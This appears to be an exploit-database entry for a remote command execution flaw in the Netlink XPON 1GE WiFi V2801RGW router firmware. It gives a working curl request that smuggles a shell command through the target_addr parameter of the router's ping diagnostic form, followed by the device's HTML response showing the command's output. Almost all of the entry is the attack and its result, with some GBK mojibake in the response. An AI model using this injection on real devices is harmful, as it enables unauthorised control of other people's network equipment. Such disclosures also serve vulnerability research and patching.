53 lines
No EOL
1.5 KiB
Text
53 lines
No EOL
1.5 KiB
Text
# Exploit Title: Netlink XPON 1GE WiFi V2801RGW - Remote Command Execution
|
||
# Google Dork: Not applicable
|
||
# Date: 2020-05-13
|
||
# Exploit Author: Seecko Das
|
||
# Vendor Homepage: https://www.crtindia.com/
|
||
# Version: V3.3.0-190627
|
||
# Tested on: Windows 10/Linux (Kali)
|
||
# CVE: N/A
|
||
|
||
Exploit :
|
||
|
||
curl -L -d "target_addr=1.1.1.1+%7C+ls&waninf=1_INTERNET_R_VID_168" http://IPADDRESS/boaform/admin/formPing
|
||
|
||
|
||
Response :
|
||
|
||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
|
||
<!--ϵͳĬ<CDB3><C4AC>ģ<EFBFBD><C4A3>-->
|
||
<html>
|
||
<head>
|
||
<title>PING<4E><47><EFBFBD>Խ<EFBFBD><D4BD></title>
|
||
<meta http-equiv=pragma content=no-cache>
|
||
<meta http-equiv=refresh content="2">
|
||
<meta http-equiv=cache-control content="no-cache, must-revalidate">
|
||
<meta http-equiv=content-type content="text/html; charset=gbk">
|
||
<meta http-equiv=content-script-type content=text/javascript>
|
||
<!--ϵͳ<CFB5><CDB3><EFBFBD><EFBFBD>css-->
|
||
<style type=text/css>
|
||
@import url(/style/default.css);
|
||
</style>
|
||
<!--ϵͳ<CFB5><CDB3><EFBFBD><EFBFBD><EFBFBD>ű<EFBFBD>-->
|
||
<script language="javascript" src="common.js"></script>
|
||
</head>
|
||
<!-------------------------------------------------------------------------------------->
|
||
<!--<2D><>ҳ<EFBFBD><D2B3><EFBFBD><EFBFBD>-->
|
||
<body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" alink="#000000" link="#000000" vlink="#000000">
|
||
<blockquote>
|
||
<form>
|
||
<div align="left" style="padding-left:20px;"><br>
|
||
<div align="left"><b>Please wait</b>
|
||
<br><br>
|
||
</div>
|
||
<pre>
|
||
boa.conf
|
||
web
|
||
</pre>
|
||
|
||
<input type=button value="back" onClick=window.location.replace("/diag_ping_admin.asp")>
|
||
</div>
|
||
</form>
|
||
</blockquote>
|
||
</body>
|
||
</html> |